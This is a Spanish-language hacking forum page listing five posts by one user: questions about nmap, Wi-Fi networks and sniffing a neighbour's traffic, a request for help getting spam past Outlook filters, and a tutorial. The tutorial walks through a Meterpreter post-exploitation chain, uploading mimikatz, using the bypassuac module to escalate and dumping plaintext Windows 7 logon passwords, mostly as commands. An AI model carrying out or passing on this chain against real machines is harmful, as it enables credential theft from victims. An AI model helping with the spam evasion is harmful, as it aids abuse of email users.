Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Typh0n

#1
Buenas acabo de instalar nmap en un vps

y cada vez que quiero escanear una ip me tira el siguiente resultado

Código: php
Starting Nmap 6.25 ( http://nmap.org ) at 2014-05-02 20:50 EDT
Initiating ARP Ping Scan at 20:50
Scanning 190.234.x.x [1 port]
Completed ARP Ping Scan at 20:50, 0.42s elapsed (1 total hosts)
Nmap scan report for 190.234.x.x [host down]
Read data files from: /usr/local/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 0.48 seconds
           Raw packets sent: 2 (56B) | Rcvd: 0 (0B)


A pesar de que "hay ping", recibo este mensaje alguien tiene idea de porque ?

PD: Linux Typh0n 2.6.32-042stab084.20 #1 SMP Mon Jan 27 00:40:08 MSK 2014 i686 i686 i386 GNU/Linux
#2
Bueno amigos estoy investigando en esto del "spam" al inbox, en gmail no tengo problemas ya que hasta con un simple script en php llega al inbox, en donde si me parece complicado en en outlook, acabo de conseguir un cpanel donde cree una cuenta de correo para intentar con una cuenta smtp y obtengo el siguiente resultado (código del correo)

Código: php
Authentication-Results: hotmail.com; spf=softfail
X-AUTH-Result: FAIL
X-SID-Result: FAIL


como vi eso de spf, lo active en el cpanel junto con el de domainkeys, y al finalizar se activaron correctamente pero nuevamente me vuelve a aparecer softfail, haber si alguien me da una mano con esto
la ip no esta en listas negras ...

PD: estoy usando sendblaster para los envios de correos con la cuenta smtp ...
#3
Resulta que me conecto varias red con essid similares vendedor1,vendedor2,vendor3 (todos con la misma contraseña), WPA, y cuando entro al panel del router 192.168.1.1 y veo la parte de wireless veo que tiene un nombre WLAN_XXX por ejemplo y ninguno de los de arriba, ademas con nmap no hay ningun otra ip que pueda ser un router o algo asi, como se maneja este tipo de redes ?


PD: tengo conexion a internet ..
#4
Hacking / Meterpreter + mimikatz
Marzo 05, 2014, 05:52:00 AM

En esta pequeña guía les mostrare como obtener la contraseña de un Windows 7.

Cuando tenemos una sesión con meterpreter y queremos elevar privilegio lo normal es hacer uso de

Código: bash
getsystem
o también

Código: bash
hashdump
pero este ultimo nos arroja los hashes y desencriptarlo puede ser un problema (tiempo).

Si hicieramos uso de getsystem posiblemente obtengamos este error:



Esto es porque para poder ejecutar mimikatz con una shell (cmd), necesitamos privilegios, descargamos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, lo que no interesa es la aplicacion de 32 bits, dentro del directorio Win32



ya que tratandose de un Windows 7 de 32 bits obviamente haremos uso de ello.

subimos mimikatz.exe con el comando upload



lo siguiente es lanzar una shell

Código: bash
shell


y posteriormente ejecutar mimikatz.exe con los comandos propios de la aplicación.

Código: bash

privilege::debug
sekurlsa::logonPasswords full


Nos saldrá este error esto por el tema de privilegios



Para ello haremos uso de este exploit "exploit/windows/local/bypassuac", pero antes tenemos que enviar la sesion a background con el mismo comando.

Código: bash
background




Luego lanzamos el exploit con la sesion del Windows 7 en este caso la primera

Código: bash

use exploit/windows/local/bypassuac
set SESSION 1
exploit




Luego habremos obtenido una segunda sesión con privilegios de administrador, hacemos uso de ella con

Código: bash
sessions -i 2


nos damos cuenta que tenemos maximos privilegios con el comando

Código: bash
getuid




Finalmente lanzamos la shell y ejecutamos mimikatz.exe



Eso es todo Saludos  :)

#5
Bueno amigos muchos hemos visto el post de chema sobre


hackeando-al-vecino-hax0r-que-me-roba-la-wifi

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

en una parte menciona que captura el trafico de la red con airdecrypt en backtrack, hasta ahora no logro dar con el es posible que se haya equivocado de nombre, imagino que es una tool que guarda todo el trafico en un .cap para luego analizarlo ...

Saludos